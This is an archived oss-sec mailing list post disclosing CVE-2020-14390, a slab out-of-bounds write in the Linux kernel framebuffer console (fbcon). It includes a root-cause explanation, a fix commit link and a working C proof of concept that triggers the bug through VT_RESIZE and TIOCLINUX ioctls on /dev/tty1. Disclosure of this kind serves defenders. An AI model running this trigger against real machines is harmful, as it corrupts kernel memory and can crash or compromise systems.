Vulmon
<!--X-Body-Begin-->
<!--X-User-Header-->
oss-sec
mailing list archives
<!--X-User-Header-End-->
<!--X-TopPNI-->
By Date
By Thread
</form>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
CVE-2020-14390: Linux kernel: slab-out-of-bounds in fbcon
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
From: Minh Yuan <yuanmingbuaa () gmail com>
Date: Tue, 15 Sep 2020 18:23:20 +0800
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
Hi,
I found a out-of-bound write in fbcon_redraw_softback while the kernel
version <= 5.9.rc5. The oldest affected kernel version is 2.2.3.
The root cause of this vulnerability is that the value of vc->vc_origin is
not updated in time while invoking vc_do_resize.
This is my PoC (need the permission to open and write the tty, and need to
have a fbcon driver):
// author by ziiiro@thu
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
int main(int argc, char** argv)
{
int fd = open("/dev/tty1", O_RDWR, 0);
unsigned short size1[3] = {3, 0x21, 0};
ioctl(fd, 0x5609, size1); // VT_RESIZE
for (int i = 0; i < 30; i++) {
write(fd, "\x0a", 1);
}
signed int args[3] = {13, -5, 0};
ioctl(fd, 0x541c, args); // TIOCLINUX
unsigned short size2[3] = {3, 0x39, 0};
ioctl(fd, 0x5609, size2); // VT_RESIZE
}
This is the commit to patch the issue:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50145474f6ef4a9c19205b173da6264a644c7489
Thanks,
Yuan Ming, Tsinghua University
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
By Date
By Thread
Current thread:
CVE-2020-14390: Linux kernel: slab-out-of-bounds in fbcon Minh Yuan (Sep 15)
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->